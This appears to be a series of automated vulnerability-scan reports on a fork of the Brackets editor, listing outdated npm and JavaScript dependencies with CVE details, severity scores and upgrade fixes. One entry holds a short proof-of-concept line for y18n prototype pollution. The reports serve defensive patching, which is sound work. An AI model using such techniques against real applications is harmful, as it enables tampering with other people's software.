This project forked from adobe/brackets
An open source code editor for the web, written in JavaScript, HTML and CSS.
Home Page: http://brackets.io
License: MIT License
![mend-bolt-for-github[bot] avatar](https://avatars.githubusercontent.com/in/16809?v=4 "mend-bolt-for-github[bot]")
Vulnerable Library - serialize-javascript-1.9.1.tgzSerialize JavaScript to a superset of JSON that includes regular expressions and functions.
Library home page: https://registry.npmjs.org/serialize-javascript/-/serialize-javascript-1.9.1.tgz
Path to dependency file: brackets/package.json
Path to vulnerable library: brackets/node_modules/serialize-javascript/package.json
Dependency Hierarchy:
Found in HEAD commit: 3fa45ae9a1a5190c6d0729a3d4b58907c1ad749e
Found in base branch: master
Vulnerability Details
The serialize-javascript npm package before version 2.1.1 is vulnerable to Cross-site Scripting (XSS). It does not properly mitigate against unsafe characters in serialized regular expressions. This vulnerability is not affected on Node.js environment since Node.js's implementation of RegExp.prototype.toString() backslash-escapes all forward slashes in regular expressions. If serialized data of regular expression objects are used in an environment other than Node.js, it is affected by this vulnerability.
Publish Date: 2019-12-05
URL: CVE-2019-16769
CVSS 3 Score Details (5.4)
Base Score Metrics:
Suggested Fix
Type: Upgrade version
Origin: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16769
Release Date: 2019-12-05
Fix Resolution: v2.1.1
Step up your Open Source Security Game with WhiteSource here
Vulnerable Libraries - y18n-4.0.0.tgz, y18n-3.2.1.tgz
the bare-bones internationalization library used by yargs
Library home page: https://registry.npmjs.org/y18n/-/y18n-4.0.0.tgz
Path to dependency file: brackets/package.json
Path to vulnerable library: brackets/node_modules/npm/node_modules/y18n/package.json
Dependency Hierarchy:
the bare-bones internationalization library used by yargs
Library home page: https://registry.npmjs.org/y18n/-/y18n-3.2.1.tgz
Path to dependency file: brackets/package.json
Path to vulnerable library: brackets/node_modules/npm/node_modules/yargs/node_modules/y18n/package.json
Dependency Hierarchy:
Found in HEAD commit: 38b389e26019954346ecebf98a10c2f5fa9a0488
Found in base branch: master
Vulnerability Details
This affects the package y18n before 3.2.2, 4.0.1 and 5.0.5. PoC by po6ix: const y18n = require('y18n')(); y18n.setLocale('proto'); y18n.updateLocale({polluted: true}); console.log(polluted); // true
Publish Date: 2020-11-17
URL: CVE-2020-7774
CVSS 3 Score Details (7.3)
Base Score Metrics:
Suggested Fix
Type: Upgrade version
Origin: https://www.npmjs.com/advisories/1654
Release Date: 2020-11-17
Fix Resolution: 3.2.2, 4.0.1, 5.0.5
Step up your Open Source Security Game with WhiteSource here
Vulnerable Library - path-parse-1.0.6.tgzNode.js path.parse() ponyfill
Library home page: https://registry.npmjs.org/path-parse/-/path-parse-1.0.6.tgz
Path to dependency file: brackets/package.json
Path to vulnerable library: brackets/node_modules/npm/node_modules/path-parse/package.json
Dependency Hierarchy:
Found in HEAD commit: 38b389e26019954346ecebf98a10c2f5fa9a0488
Found in base branch: master
Vulnerability Details
All versions of package path-parse are vulnerable to Regular Expression Denial of Service (ReDoS) via splitDeviceRe, splitTailRe, and splitPathRe regular expressions. ReDoS exhibits polynomial worst-case time complexity.
Publish Date: 2021-05-04
URL: CVE-2021-23343
CVSS 3 Score Details (7.5)
Base Score Metrics:
Suggested Fix
Type: Upgrade version
Origin: jbgutierrez/path-parse#8
Release Date: 2021-05-04
Fix Resolution: path-parse - 1.0.7
Step up your Open Source Security Game with WhiteSource here
Vulnerable Library - bootstrap-2.0.3.min.jsThe most popular front-end framework for developing responsive, mobile first projects on the web.
Library home page: https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/2.0.3/bootstrap.min.js
Path to dependency file: brackets/test/SpecRunner.html
Path to vulnerable library: /test/thirdparty/bootstrap2/js/bootstrap.min.js
Dependency Hierarchy:
Found in HEAD commit: 38b389e26019954346ecebf98a10c2f5fa9a0488
Found in base branch: master
Vulnerability Details
In Bootstrap before 3.4.0, XSS is possible in the tooltip data-viewport attribute.
Publish Date: 2019-01-09
URL: CVE-2018-20676
CVSS 3 Score Details (6.1)
Base Score Metrics:
Suggested Fix
Type: Upgrade version
Origin: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20676
Release Date: 2019-01-09
Fix Resolution: bootstrap - 3.4.0
Step up your Open Source Security Game with WhiteSource here
Vulnerable Library - cryptiles-2.0.5.tgzGeneral purpose crypto utilities
Library home page: https://registry.npmjs.org/cryptiles/-/cryptiles-2.0.5.tgz
Path to dependency file: brackets/src/package.json
Path to vulnerable library: brackets/src/node_modules/cryptiles/package.json,brackets/node_modules/cryptiles/package.json
Dependency Hierarchy:
Found in HEAD commit: 38b389e26019954346ecebf98a10c2f5fa9a0488
Found in base branch: master
Vulnerability Details
Eran Hammer cryptiles version 4.1.1 earlier contains a CWE-331: Insufficient Entropy vulnerability in randomDigits() method that can result in An attacker is more likely to be able to brute force something that was supposed to be random.. This attack appear to be exploitable via Depends upon the calling application.. This vulnerability appears to have been fixed in 4.1.2.
Publish Date: 2018-07-09
URL: CVE-2018-1000620
CVSS 3 Score Details (9.8)
Base Score Metrics:
Suggested Fix
Type: Upgrade version
Origin: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-1000620
Release Date: 2018-07-09
Fix Resolution: v4.1.2
Step up your Open Source Security Game with WhiteSource here
Vulnerable Libraries - uglify-js-2.2.5.tgz, uglify-js-1.0.7.tgz
JavaScript parser, mangler/compressor and beautifier toolkit
Library home page: https://registry.npmjs.org/uglify-js/-/uglify-js-2.2.5.tgz
Path to dependency file: brackets/package.json
Path to vulnerable library: brackets/node_modules/uglify-js/package.json
Dependency Hierarchy:
Library home page: https://registry.npmjs.org/uglify-js/-/uglify-js-1.0.7.tgz
Path to dependency file: brackets/src/extensions/default/JavaScriptQuickEdit/unittest-files/jquery-ui/package.json
Path to vulnerable library: brackets/src/extensions/default/JavaScriptQuickEdit/unittest-files/jquery-ui/node_modules/uglify-js/package.json
Dependency Hierarchy:
Found in HEAD commit: 3fa45ae9a1a5190c6d0729a3d4b58907c1ad749e
Found in base branch: checkTravis
Vulnerability Details
uglifier incorrectly handles non-boolean comparisons during minification.The upstream library for the Ruby uglifier gem, UglifyJS, is affected by a vulnerability that allows a specially crafted Javascript file to have altered functionality after minification. This bug, found in UglifyJS versions 2.4.23 and earlier, was demonstrated to allow potentially malicious code to be hidden within secure code, and activated by the minification process.
Publish Date: 2015-07-22
URL: WS-2015-0033
CVSS 3 Score Details (7.2)
Base Score Metrics:
Suggested Fix
Type: Upgrade version
Origin: https://hakiri.io/technologies/uglifier/issues/279911d9720338
Release Date: 2020-06-07
Fix Resolution: Uglifier - 2.7.2;uglify-js - v2.4.24
Step up your Open Source Security Game with WhiteSource here
Vulnerable Library - mime-1.4.0.tgzA comprehensive library for mime-type mapping
Library home page: https://registry.npmjs.org/mime/-/mime-1.4.0.tgz
Path to dependency file: brackets/src/package.json
Path to vulnerable library: brackets/src/node_modules/mime/package.json
Dependency Hierarchy:
Found in HEAD commit: 38b389e26019954346ecebf98a10c2f5fa9a0488
Found in base branch: master
Vulnerability Details
The mime module < 1.4.1, 2.0.1, 2.0.2 is vulnerable to regular expression denial of service when a mime lookup is performed on untrusted user input.
Publish Date: 2018-06-07
URL: CVE-2017-16138
CVSS 3 Score Details (7.5)
Base Score Metrics:
Suggested Fix
Type: Upgrade version
Origin: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16138
Release Date: 2018-06-07
Fix Resolution: 1.4.1,2.0.3
Step up your Open Source Security Game with WhiteSource here
Vulnerable Library - bootstrap-2.0.3.min.jsThe most popular front-end framework for developing responsive, mobile first projects on the web.
Library home page: https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/2.0.3/bootstrap.min.js
Path to dependency file: brackets/test/SpecRunner.html
Path to vulnerable library: /test/thirdparty/bootstrap2/js/bootstrap.min.js
Dependency Hierarchy:
Found in HEAD commit: 38b389e26019954346ecebf98a10c2f5fa9a0488
Found in base branch: master
Vulnerability Details
In Bootstrap before 3.4.1 and 4.3.x before 4.3.1, XSS is possible in the tooltip or popover data-template attribute.
Publish Date: 2019-02-20
URL: CVE-2019-8331
CVSS 3 Score Details (6.1)
Base Score Metrics:
Suggested Fix
Type: Upgrade version
Origin: twbs/bootstrap#28236
Release Date: 2019-02-20
Fix Resolution: bootstrap - 3.4.1,4.3.1;bootstrap-sass - 3.4.1,4.3.1
Step up your Open Source Security Game with WhiteSource here
Vulnerable Libraries - jquery-2.1.3.min.js, jquery-1.7.1.min.js
JavaScript library for DOM operations
Library home page: https://cdnjs.cloudflare.com/ajax/libs/jquery/2.1.3/jquery.min.js
Path to dependency file: brackets/src/index.html
Path to vulnerable library: /src/thirdparty/jquery-2.1.3.min.js,/test/../src/thirdparty/jquery-2.1.3.min.js
Dependency Hierarchy:
JavaScript library for DOM operations
Library home page: https://cdnjs.cloudflare.com/ajax/libs/jquery/1.7.1/jquery.min.js
Path to dependency file: brackets/src/LiveDevelopment/Inspector/inspector.html
Path to vulnerable library: /src/LiveDevelopment/Inspector/inspector.html
Dependency Hierarchy:
Found in HEAD commit: 38b389e26019954346ecebf98a10c2f5fa9a0488
Found in base branch: master
Vulnerability Details
In jQuery versions greater than or equal to 1.0.3 and before 3.5.0, passing HTML containing elements from untrusted sources - even after sanitizing it - to one of jQuery's DOM manipulation methods (i.e. .html(), .append(), and others) may execute untrusted code. This problem is patched in jQuery 3.5.0.
Publish Date: 2020-04-29
URL: CVE-2020-11023
CVSS 3 Score Details (6.1)
Base Score Metrics:
Suggested Fix
Type: Upgrade version
Release Date: 2020-04-29
Fix Resolution: jquery - 3.5.0;jquery-rails - 4.4.0
Step up your Open Source Security Game with WhiteSource here
Vulnerable Libraries - minimatch-0.4.0.tgz, minimatch-0.3.0.tgz, minimatch-0.2.14.tgz
a glob matcher in javascript
Library home page: https://registry.npmjs.org/minimatch/-/minimatch-0.4.0.tgz
Path to dependency file: /package.json
Path to vulnerable library: /node_modules/fileset/node_modules/minimatch/package.json
Dependency Hierarchy:
a glob matcher in javascript
Library home page: https://registry.npmjs.org/minimatch/-/minimatch-0.3.0.tgz
Path to dependency file: /package.json
Path to vulnerable library: /node_modules/fileset/node_modules/glob/node_modules/minimatch/package.json,/node_modules/grunt-cli/node_modules/minimatch/package.json,/src/extensions/default/JavaScriptCodeHints/node_modules/glob/node_modules/minimatch/package.json
Dependency Hierarchy:
a glob matcher in javascript
Library home page: https://registry.npmjs.org/minimatch/-/minimatch-0.2.14.tgz
Path to dependency file: /src/extensions/default/JavaScriptCodeHints/package.json
Path to vulnerable library: /src/extensions/default/JavaScriptCodeHints/node_modules/minimatch/package.json,/src/extensions/default/JavaScriptQuickEdit/unittest-files/jquery-ui/node_modules/minimatch/package.json,/node_modules/jasmine-node/node_modules/minimatch/package.json
Dependency Hierarchy:
Found in HEAD commit: 3fa45ae9a1a5190c6d0729a3d4b58907c1ad749e
Found in base branch: gh-pages
Vulnerability Details
Minimatch is a minimal matching utility that works by converting glob expressions into JavaScript RegExp objects. The primary function, minimatch(path, pattern) in Minimatch 3.0.1 and earlier is vulnerable to ReDoS in the pattern parameter.
Publish Date: 2018-04-26
URL: CVE-2016-10540
CVSS 3 Score Details (7.5)
Base Score Metrics:
Suggested Fix
Type: Upgrade version
Origin: https://nvd.nist.gov/vuln/detail/CVE-2016-10540
Release Date: 2018-04-26
Fix Resolution (minimatch): 3.0.2
Direct dependency fix Resolution (jasmine-node): 1.14.6
Fix Resolution (minimatch): 3.0.2
Direct dependency fix Resolution (tern): 0.21.0
Fix Resolution (minimatch): 3.0.2
Direct dependency fix Resolution (tern): 0.21.0
Step up your Open Source Security Game with Mend here
Vulnerable Library - tunnel-agent-0.4.3.tgzHTTP proxy tunneling agent. Formerly part of mikeal/request, now a standalone module.
Library home page: https://registry.npmjs.org/tunnel-agent/-/tunnel-agent-0.4.3.tgz
Path to dependency file: brackets/package.json
Path to vulnerable library: brackets/node_modules/tunnel-agent/package.json
Dependency Hierarchy:
Found in HEAD commit: 38b389e26019954346ecebf98a10c2f5fa9a0488
Found in base branch: master
Vulnerability Details
Versions of tunnel-agent before 0.6.0 are vulnerable to memory exposure.
This is exploitable if user supplied input is provided to the auth value and is a number.
Publish Date: 2017-03-05
URL: WS-2018-0076
CVSS 3 Score Details (5.1)
Base Score Metrics:
Suggested Fix
Type: Upgrade version
Origin: https://nodesecurity.io/advisories/598
Release Date: 2018-01-27
Fix Resolution: 0.6.0
Step up your Open Source Security Game with WhiteSource here
Vulnerable Library - tough-cookie-2.3.2.tgzRFC6265 Cookies and Cookie Jar for node.js
Library home page: https://registry.npmjs.org/tough-cookie/-/tough-cookie-2.3.2.tgz
Path to dependency file: /src/package.json
Path to vulnerable library: /src/node_modules/tough-cookie/package.json
Dependency Hierarchy:
Found in HEAD commit: 3fa45ae9a1a5190c6d0729a3d4b58907c1ad749e
Found in base branch: gh-pages
Vulnerability Details
A ReDoS (regular expression denial of service) flaw was found in the tough-cookie module before 2.3.3 for Node.js. An attacker that is able to make an HTTP request using a specially crafted cookie may cause the application to consume an excessive amount of CPU.
Publish Date: 2017-10-04
URL: CVE-2017-15010
CVSS 3 Score Details (7.5)
Base Score Metrics:
Suggested Fix
Type: Upgrade version
Origin: https://nvd.nist.gov/vuln/detail/CVE-2017-15010
Release Date: 2017-10-03
Fix Resolution (tough-cookie): 2.3.3
Direct dependency fix Resolution (less): 2.7.3
Step up your Open Source Security Game with Mend here
Vulnerable Library - path-parse-1.0.6.tgzNode.js path.parse() ponyfill
Library home page: https://registry.npmjs.org/path-parse/-/path-parse-1.0.6.tgz
Path to dependency file: /package.json
Path to vulnerable library: /node_modules/npm/node_modules/path-parse/package.json
Dependency Hierarchy:
Found in HEAD commit: 3fa45ae9a1a5190c6d0729a3d4b58907c1ad749e
Found in base branch: gh-pages
Vulnerability Details
All versions of package path-parse are vulnerable to Regular Expression Denial of Service (ReDoS) via splitDeviceRe, splitTailRe, and splitPathRe regular expressions. ReDoS exhibits polynomial worst-case time complexity.
Publish Date: 2021-05-04
URL: CVE-2021-23343
CVSS 3 Score Details (7.5)
Base Score Metrics:
Suggested Fix
Type: Upgrade version
Release Date: 2021-05-04
Fix Resolution (path-parse): 1.0.7
Direct dependency fix Resolution (npm): 6.14.7
Step up your Open Source Security Game with Mend here
Vulnerable Libraries - jquery-1.7.1.min.js, jquery-1.3.2.min.js
JavaScript library for DOM operations
Library home page: https://cdnjs.cloudflare.com/ajax/libs/jquery/1.7.1/jquery.min.js
Path to dependency file: brackets/src/LiveDevelopment/Inspector/inspector.html
Path to vulnerable library: /src/LiveDevelopment/Inspector/inspector.html
Dependency Hierarchy:
JavaScript library for DOM operations
Library home page: https://cdnjs.cloudflare.com/ajax/libs/jquery/1.3.2/jquery.min.js
Path to dependency file: brackets/src/extensions/default/JavaScriptQuickEdit/unittest-files/jquery-ui/node_modules/underscore.string/test/test_underscore/temp_tests.html
Path to vulnerable library: /src/extensions/default/JavaScriptQuickEdit/unittest-files/jquery-ui/node_modules/underscore.string/test/test_underscore/vendor/jquery.js
Dependency Hierarchy:
Found in HEAD commit: 38b389e26019954346ecebf98a10c2f5fa9a0488
Found in base branch: master
Vulnerability Details
jquery prior to 1.9.0 allows Cross-site Scripting attacks via the load method. The load method fails to recognize and remove "<script>" HTML tags that contain a whitespace character, i.e: "</script >", which results in the enclosed script logic to be executed.
Publish Date: 2020-05-19
URL: CVE-2020-7656
CVSS 3 Score Details (6.1)
Base Score Metrics:
Suggested Fix
Type: Upgrade version
Origin: GHSA-q4m3-2j7h-f7xw
Release Date: 2020-05-28
Fix Resolution: jquery - 1.9.0
Step up your Open Source Security Game with WhiteSource here
Vulnerable Libraries - jquery-2.1.3.min.js, jquery-1.7.1.min.js, jquery-1.3.2.min.js
JavaScript library for DOM operations
Library home page: https://cdnjs.cloudflare.com/ajax/libs/jquery/2.1.3/jquery.min.js
Path to dependency file: brackets/src/index.html
Path to vulnerable library: /src/thirdparty/jquery-2.1.3.min.js,/test/../src/thirdparty/jquery-2.1.3.min.js
Dependency Hierarchy:
JavaScript library for DOM operations
Library home page: https://cdnjs.cloudflare.com/ajax/libs/jquery/1.7.1/jquery.min.js
Path to dependency file: brackets/src/LiveDevelopment/Inspector/inspector.html
Path to vulnerable library: /src/LiveDevelopment/Inspector/inspector.html
Dependency Hierarchy:
JavaScript library for DOM operations
Library home page: https://cdnjs.cloudflare.com/ajax/libs/jquery/1.3.2/jquery.min.js
Path to dependency file: brackets/src/extensions/default/JavaScriptQuickEdit/unittest-files/jquery-ui/node_modules/underscore.string/test/test_underscore/temp_tests.html
Path to vulnerable library: /src/extensions/default/JavaScriptQuickEdit/unittest-files/jquery-ui/node_modules/underscore.string/test/test_underscore/vendor/jquery.js
Dependency Hierarchy:
Found in HEAD commit: 38b389e26019954346ecebf98a10c2f5fa9a0488
Found in base branch: master
Vulnerability Details
jQuery before 3.0.0 is vulnerable to Cross-site Scripting (XSS) attacks when a cross-domain Ajax request is performed without the dataType option, causing text/javascript responses to be executed.
Publish Date: 2018-01-18
URL: CVE-2015-9251
CVSS 3 Score Details (6.1)
Base Score Metrics:
Suggested Fix
Type: Upgrade version
Origin: https://nvd.nist.gov/vuln/detail/CVE-2015-9251
Release Date: 2018-01-18
Fix Resolution: jQuery - v3.0.0
Step up your Open Source Security Game with WhiteSource here
Vulnerable Library - dot-prop-4.2.0.tgzGet, set, or delete a property from a nested object using a dot path
Library home page: https://registry.npmjs.org/dot-prop/-/dot-prop-4.2.0.tgz
Path to dependency file: /package.json
Path to vulnerable library: /node_modules/npm/node_modules/dot-prop/package.json
Dependency Hierarchy:
Found in HEAD commit: 3fa45ae9a1a5190c6d0729a3d4b58907c1ad749e
Found in base branch: gh-pages
Vulnerability Details
Prototype pollution vulnerability in dot-prop npm package versions before 4.2.1 and versions 5.x before 5.1.1 allows an attacker to add arbitrary properties to JavaScript language constructs such as objects.
Publish Date: 2020-02-04
URL: CVE-2020-8116
CVSS 3 Score Details (7.3)
Base Score Metrics:
Suggested Fix
Type: Upgrade version
Origin: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8116
Release Date: 2020-02-04
Fix Resolution (dot-prop): 4.2.1
Direct dependency fix Resolution (npm): 6.14.7
Step up your Open Source Security Game with Mend here
Vulnerable Library - connect-1.8.7.tgzHigh performance middleware framework
Library home page: https://registry.npmjs.org/connect/-/connect-1.8.7.tgz
Path to dependency file: /src/extensions/default/JavaScriptQuickEdit/unittest-files/jquery-ui/package.json
Path to vulnerable library: /src/extensions/default/JavaScriptQuickEdit/unittest-files/jquery-ui/node_modules/connect/package.json
Dependency Hierarchy:
Found in HEAD commit: 3fa45ae9a1a5190c6d0729a3d4b58907c1ad749e
Found in base branch: gh-pages
Vulnerability Details
The "methodOverride" let the http post to override the method of the request with the value of the post key or with the header, which allows XSS attack.
Publish Date: 2013-06-27
URL: WS-2013-0004
CVSS 3 Score Details (6.1)
Base Score Metrics:
Suggested Fix
Type: Upgrade version
Release Date: 2013-06-27
Fix Resolution (connect): 2.8.1
Direct dependency fix Resolution (grunt): 0.4.0
Step up your Open Source Security Game with Mend here
Vulnerable Library - ini-1.3.5.tgzAn ini encoder/decoder for node
Library home page: https://registry.npmjs.org/ini/-/ini-1.3.5.tgz
Path to dependency file: /package.json
Path to vulnerable library: /node_modules/npm/node_modules/ini/package.json
Dependency Hierarchy:
Found in HEAD commit: 3fa45ae9a1a5190c6d0729a3d4b58907c1ad749e
Found in base branch: gh-pages
Vulnerability Details
This affects the package ini before 1.3.6. If an attacker submits a malicious INI file to an application that parses it with ini.parse, they will pollute the prototype on the application. This can be exploited further depending on the context.
Publish Date: 2020-12-11
URL: CVE-2020-7788
CVSS 3 Score Details (9.8)
Base Score Metrics:
Suggested Fix
Type: Upgrade version
Origin: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7788
Release Date: 2020-12-11
Fix Resolution (ini): 1.3.6
Direct dependency fix Resolution (npm): 6.14.7
Step up your Open Source Security Game with Mend here
Vulnerable Library - growl-1.7.0.tgzGrowl unobtrusive notifications
Library home page: https://registry.npmjs.org/growl/-/growl-1.7.0.tgz
Path to dependency file: /package.json
Path to vulnerable library: /node_modules/growl/package.json
Dependency Hierarchy:
Found in HEAD commit: 38b389e26019954346ecebf98a10c2f5fa9a0488
Found in base branch: gh-pages
Vulnerability Details
Growl adds growl notification support to nodejs. Growl before 1.10.2 does not properly sanitize input before passing it to exec, allowing for arbitrary command execution.
Publish Date: 2018-04-26
URL: CVE-2017-16042
CVSS 3 Score Details (9.8)
Base Score Metrics:
Suggested Fix
Type: Upgrade version
Origin: https://nvd.nist.gov/vuln/detail/CVE-2017-16042
Release Date: 2018-04-26
Fix Resolution (growl): 1.10.2
Direct dependency fix Resolution (jasmine-node): 3.0.0
Step up your Open Source Security Game with Mend here
Vulnerable Library - growl-1.10.0.tgzGrowl unobtrusive notifications
Library home page: https://registry.npmjs.org/growl/-/growl-1.10.0.tgz
Path to dependency file: brackets/package.json
Path to vulnerable library: brackets/node_modules/growl/package.json
Dependency Hierarchy:
Found in HEAD commit: 3fa45ae9a1a5190c6d0729a3d4b58907c1ad749e
Found in base branch: master
Vulnerability Details
Growl adds growl notification support to nodejs. Growl before 1.10.2 does not properly sanitize input before passing it to exec, allowing for arbitrary command execution.
Publish Date: 2018-06-04
URL: CVE-2017-16042
CVSS 3 Score Details (9.8)
Base Score Metrics:
Suggested Fix
Type: Upgrade version
Origin: https://nvd.nist.gov/vuln/detail/CVE-2017-16042
Release Date: 2018-06-04
Fix Resolution: 1.10.2
Step up your Open Source Security Game with WhiteSource here
Vulnerable Library - tough-cookie-2.2.2.tgzRFC6265 Cookies and Cookie Jar for node.js
Library home page: https://registry.npmjs.org/tough-cookie/-/tough-cookie-2.2.2.tgz
Path to dependency file: brackets/package.json
Path to vulnerable library: brackets/node_modules/phantomjs/node_modules/tough-cookie/package.json
Dependency Hierarchy:
Found in HEAD commit: 38b389e26019954346ecebf98a10c2f5fa9a0488
Found in base branch: master
Vulnerability Details
NodeJS Tough-Cookie version 2.2.2 contains a Regular Expression Parsing vulnerability in HTTP request Cookie Header parsing that can result in Denial of Service. This attack appear to be exploitable via Custom HTTP header passed by client. This vulnerability appears to have been fixed in 2.3.0.
Publish Date: 2018-09-05
URL: CVE-2016-1000232
CVSS 3 Score Details (5.3)
Base Score Metrics:
Suggested Fix
Type: Upgrade version
Origin: https://www.npmjs.com/advisories/130
Release Date: 2018-09-05
Fix Resolution: 2.3.0
Step up your Open Source Security Game with WhiteSource here
Vulnerable Libraries - qs-1.2.2.tgz, qs-5.2.0.tgz, qs-5.1.0.tgz
A querystring parser that supports nesting and arrays, with a depth limit
Library home page: https://registry.npmjs.org/qs/-/qs-1.2.2.tgz
Path to dependency file: /package.json
Path to vulnerable library: /node_modules/phantomjs/node_modules/qs/package.json
Dependency Hierarchy:
A querystring parser that supports nesting and arrays, with a depth limit
Library home page: https://registry.npmjs.org/qs/-/qs-5.2.0.tgz
Path to dependency file: /package.json
Path to vulnerable library: /node_modules/body-parser/node_modules/qs/package.json
Dependency Hierarchy:
A querystring parser that supports nesting and arrays, with a depth limit
Library home page: https://registry.npmjs.org/qs/-/qs-5.1.0.tgz
Path to dependency file: /package.json
Path to vulnerable library: /node_modules/tiny-lr/node_modules/qs/package.json
Dependency Hierarchy:
Found in HEAD commit: 3fa45ae9a1a5190c6d0729a3d4b58907c1ad749e
Found in base branch: gh-pages
Vulnerability Details
the web framework using ljharb's qs module older than v6.3.2, v6.2.3, v6.1.2, and v6.0.4 is vulnerable to a DoS. A malicious user can send a evil request to cause the web framework crash.
Publish Date: 2017-07-17
URL: CVE-2017-1000048
CVSS 3 Score Details (7.5)
Base Score Metrics:
Suggested Fix
Type: Upgrade version
Origin: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000048
Release Date: 2017-07-13
Fix Resolution (qs): 6.0.4
Direct dependency fix Resolution (grunt-contrib-watch): 1.1.0
Fix Resolution (qs): 6.0.4
Direct dependency fix Resolution (grunt-contrib-watch): 1.1.0
Step up your Open Source Security Game with Mend here
Vulnerable Library - serialize-javascript-1.9.1.tgzSerialize JavaScript to a superset of JSON that includes regular expressions and functions.
Library home page: https://registry.npmjs.org/serialize-javascript/-/serialize-javascript-1.9.1.tgz
Path to dependency file: brackets/package.json
Path to vulnerable library: brackets/node_modules/serialize-javascript/package.json
Dependency Hierarchy:
Found in HEAD commit: 38b389e26019954346ecebf98a10c2f5fa9a0488
Found in base branch: master
Vulnerability Details
serialize-javascript prior to 3.1.0 allows remote attackers to inject arbitrary code via the function "deleteFunctions" within "index.js".
Publish Date: 2020-06-01
URL: CVE-2020-7660
CVSS 3 Score Details (8.1)
Base Score Metrics:
Suggested Fix
Type: Upgrade version
Origin: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7660
Release Date: 2020-06-01
Fix Resolution: serialize-javascript - 3.1.0
Step up your Open Source Security Game with WhiteSource here
Vulnerable Library - extend-3.0.1.tgzPort of jQuery.extend for node.js and the browser
Library home page: https://registry.npmjs.org/extend/-/extend-3.0.1.tgz
Path to dependency file: /src/package.json
Path to vulnerable library: /src/node_modules/extend/package.json
Dependency Hierarchy:
Found in HEAD commit: 38b389e26019954346ecebf98a10c2f5fa9a0488
Found in base branch: gh-pages
Vulnerability Details
A prototype pollution vulnerability was found in module extend <2.0.2, ~<3.0.2 that allows an attacker to inject arbitrary properties onto Object.prototype.
Publish Date: 2019-02-01
URL: CVE-2018-16492
CVSS 3 Score Details (9.8)
Base Score Metrics:
Suggested Fix
Type: Upgrade version
Origin: https://hackerone.com/reports/381185
Release Date: 2019-02-01
Fix Resolution (extend): 3.0.2
Direct dependency fix Resolution (less): 2.7.3
Step up your Open Source Security Game with Mend here
Vulnerable Library - sshpk-1.13.1.tgzA library for finding and using SSH public keys
Library home page: https://registry.npmjs.org/sshpk/-/sshpk-1.13.1.tgz
Path to dependency file: brackets/src/package.json
Path to vulnerable library: brackets/src/node_modules/sshpk/package.json
Dependency Hierarchy:
Found in HEAD commit: 3fa45ae9a1a5190c6d0729a3d4b58907c1ad749e
Found in base branch: checkTravis
Vulnerability Details
Versions of sshpk before 1.14.1 are vulnerable to regular expression denial of service when parsing crafted invalid public keys.
Publish Date: 2018-04-25
URL: WS-2018-0084
CVSS 2 Score Details (8.0)
Base Score Metrics not available
Suggested Fix
Type: Upgrade version
Origin: https://nodesecurity.io/advisories/606
Release Date: 2018-01-27
Fix Resolution: 1.14.1
Step up your Open Source Security Game with WhiteSource here
Vulnerable Library - dot-prop-4.2.0.tgzGet, set, or delete a property from a nested object using a dot path
Library home page: https://registry.npmjs.org/dot-prop/-/dot-prop-4.2.0.tgz
Path to dependency file: brackets/package.json
Path to vulnerable library: brackets/node_modules/npm/node_modules/dot-prop/package.json
Dependency Hierarchy:
Found in HEAD commit: 38b389e26019954346ecebf98a10c2f5fa9a0488
Found in base branch: master
Vulnerability Details
Prototype pollution vulnerability in dot-prop npm package versions before 4.2.1 and versions 5.x before 5.1.1 allows an attacker to add arbitrary properties to JavaScript language constructs such as objects.
Publish Date: 2020-02-04
URL: CVE-2020-8116
CVSS 3 Score Details (7.3)
Base Score Metrics:
Suggested Fix
Type: Upgrade version
Origin: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8116
Release Date: 2020-02-04
Fix Resolution: dot-prop - 5.1.1
Step up your Open Source Security Game with WhiteSource here
Vulnerable Libraries - y18n-4.0.0.tgz, y18n-3.2.1.tgz
the bare-bones internationalization library used by yargs
Library home page: https://registry.npmjs.org/y18n/-/y18n-4.0.0.tgz
Path to dependency file: /package.json
Path to vulnerable library: /node_modules/npm/node_modules/y18n/package.json
Dependency Hierarchy:
the bare-bones internationalization library used by yargs
Library home page: https://registry.npmjs.org/y18n/-/y18n-3.2.1.tgz
Path to dependency file: /package.json
Path to vulnerable library: /node_modules/npm/node_modules/yargs/node_modules/y18n/package.json
Dependency Hierarchy:
Found in HEAD commit: 3fa45ae9a1a5190c6d0729a3d4b58907c1ad749e
Found in base branch: gh-pages
Vulnerability Details
The package y18n before 3.2.2, 4.0.1 and 5.0.5, is vulnerable to Prototype Pollution.
Publish Date: 2020-11-17
URL: CVE-2020-7774
CVSS 3 Score Details (9.8)
Base Score Metrics:
Suggested Fix
Type: Upgrade version
Origin: https://www.npmjs.com/advisories/1654
Release Date: 2020-11-17
Fix Resolution (y18n): 4.0.1
Direct dependency fix Resolution (npm): 6.14.7
Fix Resolution (y18n): 4.0.1
Direct dependency fix Resolution (npm): 6.14.7
Step up your Open Source Security Game with Mend here
Vulnerable Library - connect-1.8.7.tgzHigh performance middleware framework
Library home page: https://registry.npmjs.org/connect/-/connect-1.8.7.tgz
Path to dependency file: /src/extensions/default/JavaScriptQuickEdit/unittest-files/jquery-ui/package.json
Path to vulnerable library: /src/extensions/default/JavaScriptQuickEdit/unittest-files/jquery-ui/node_modules/connect/package.json
Dependency Hierarchy:
Found in HEAD commit: 3fa45ae9a1a5190c6d0729a3d4b58907c1ad749e
Found in base branch: gh-pages
Vulnerability Details
senchalabs/connect prior to 2.8.1 is vulnerable to xss attack
Publish Date: 2013-06-27
URL: WS-2013-0003
CVSS 3 Score Details (5.3)
Base Score Metrics:
Suggested Fix
Type: Upgrade version
Origin: https://nvd.nist.gov/vuln/detail/WS-2013-0003
Release Date: 2013-06-27
Fix Resolution (connect): 2.8.1
Direct dependency fix Resolution (grunt): 0.4.0
Step up your Open Source Security Game with Mend here
Vulnerable Library - connect-1.8.7.tgzHigh performance middleware framework
Library home page: https://registry.npmjs.org/connect/-/connect-1.8.7.tgz
Path to dependency file: brackets/src/extensions/default/JavaScriptQuickEdit/unittest-files/jquery-ui/package.json
